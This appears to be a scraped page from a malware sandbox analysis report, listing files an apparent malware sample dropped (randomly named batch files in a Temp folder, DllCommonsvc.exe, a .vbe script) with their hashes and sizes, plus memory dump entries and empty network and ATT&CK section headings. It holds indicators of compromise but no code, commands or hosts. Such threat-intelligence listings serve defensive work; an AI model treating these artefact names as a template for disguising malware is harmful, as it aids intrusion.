4343c7e3a6fda9f401e6894e2c601863

SHA1
063cddbc2e1c4658476a0314763e0f679aac1990

SHA256
39cb462a0d526880a1ccda87a1111608d582efd0c1d2adc21a82a3c25d81f079

SHA512
e169247f81b82a47cad5105315c02138c63484349a3ff231316b66d2ebad7e6cd09feb31b10286a91a12ceffbd2f7c7b79fec944cf08e3e320a75ebf26b1bb67

Download Submit
C:\Users\Admin\AppData\Local\Temp\ezHXLeVHih.bat

Filesize
248B

MD5
9f4601402aa2dcec45a3c47e0b8a7944

SHA1
56f06445fd22a5b72a37838bd9a0a0fb0be1099d

SHA256
664ef72790d0276446cdd2d4a6223541a7f9c375bdc24fe083e616950929a9b7

SHA512
56be7f5e1369a00a427dea34134711ef046e55274222894d0616ccfbb378a103f624ca6ab7466e4ff2b466d4a9b09cd8abc88dca12a7b1c463e9f70c260c49a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ixgWq8OOYW.bat

Filesize
248B

MD5
e2791682d3220f95a051275812ab1382

SHA1
8aa9bfdd632c936a6c5dfae3a8227b93c712f980

SHA256
6b4bb6ae61f6111919ad8e27250b8adc7371359ff17a325d70a6ff3a6d5c5215

SHA512
e5dee7a65b6d85a33cdf40048c02896b66eaf48e384964b68a1933d1978092e415b73bdccc771a91c0807a67d22b506541d69b64c5542087fedb256cc51cd810

Download Submit
C:\Users\Admin\AppData\Local\Temp\ottjOj3FQt.bat

Filesize
248B

MD5
489156f140bcf6538e64ba10c8ecd7df

SHA1
2875dc27f475b2265de70376c15e80455e8b54c6

SHA256
009e2083328cef5f164eae46cb5dfc313659ea6d0d2a96513588e00c365a8412

SHA512
44b0e32ee844126bb9c642e15160a200562473836b1e4df21dbb39dffc22c2c3356056c81573179efad3eb6f91fab7b18284c989d067733ee6168784343fe054

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkmftNZ3Wr.bat

Filesize
248B

MD5
96cb10acd2d1079191a5d718345c9500

SHA1
5055c1f3deb412c1e2697583dd6276c4ae3747dd

SHA256
3ae7387ebcd6d8cf47ce8b5d4168cc4e7b66709cd9b3c505b066d81de087064f

SHA512
7852aaaba9cdaaa218641fb64b6d76d6b599a633fa4469022ace29aac5f12eb23db714efb5756420a138c633b59dda63d878072594a897df3c26e2727448c75f

Download Submit
C:\Users\Admin\AppData\Local\Temp\qwHeC7tSxv.bat

Filesize
248B

MD5
4e63a61894857894b18612f3599ed1e4

SHA1
617e655a3a1a05b884e7f1fdb98311ba7bea70a6

SHA256
ab8aa3952caf50e2dbdc04affa4cd0755b97998c4eecc35127f85d77eea7e5db

SHA512
d223d125c850580f2f1625df8453df6ab29595e1d597dfe587401bc311cef5895538918bc4cb75cefa1eca226480e62224b18aec3249ba2bca0ba5228aec451f

Download Submit
C:\Users\Admin\AppData\Local\Temp\u8HczsIKxz.bat

Filesize
248B

MD5
97e0456585bff1c72824caf70778b80a

SHA1
c86a6f4802c75ee87f99d2db58ead803710907d6

SHA256
13921497c5598502511ee025233123c09691e4fc4cc839433f2713508a392934

SHA512
fc68f2d60d2c562521a9693d7255c652d47f45d7d77b101b8421737ecd460aee93f548094bf5a1b1df0762873730df662eaaa146e0546a41809bc85f8e63d477

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/3320-59-0x0000021436920000-0x0000021436942000-memory.dmp

Filesize
136KB

Download
memory/3940-282-0x000000001D740000-0x000000001D8AA000-memory.dmp

Filesize
1.4MB

Download
memory/4300-297-0x00000000011F0000-0x0000000001202000-memory.dmp

Filesize
72KB

Download
memory/4920-16-0x0000000002E90000-0x0000000002E9C000-memory.dmp

Filesize
48KB

Download
memory/4920-14-0x0000000002E80000-0x0000000002E92000-memory.dmp

Filesize
72KB

Download
memory/4920-13-0x0000000000BB0000-0x0000000000CC0000-memory.dmp

Filesize
1.1MB

Download
memory/4920-12-0x00007FFFE0333000-0x00007FFFE0335000-memory.dmp

Filesize
8KB

Download
memory/4920-15-0x000000001B8D0000-0x000000001B8DC000-memory.dmp

Filesize
48KB

Download
memory/4920-17-0x000000001B8E0000-0x000000001B8EC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.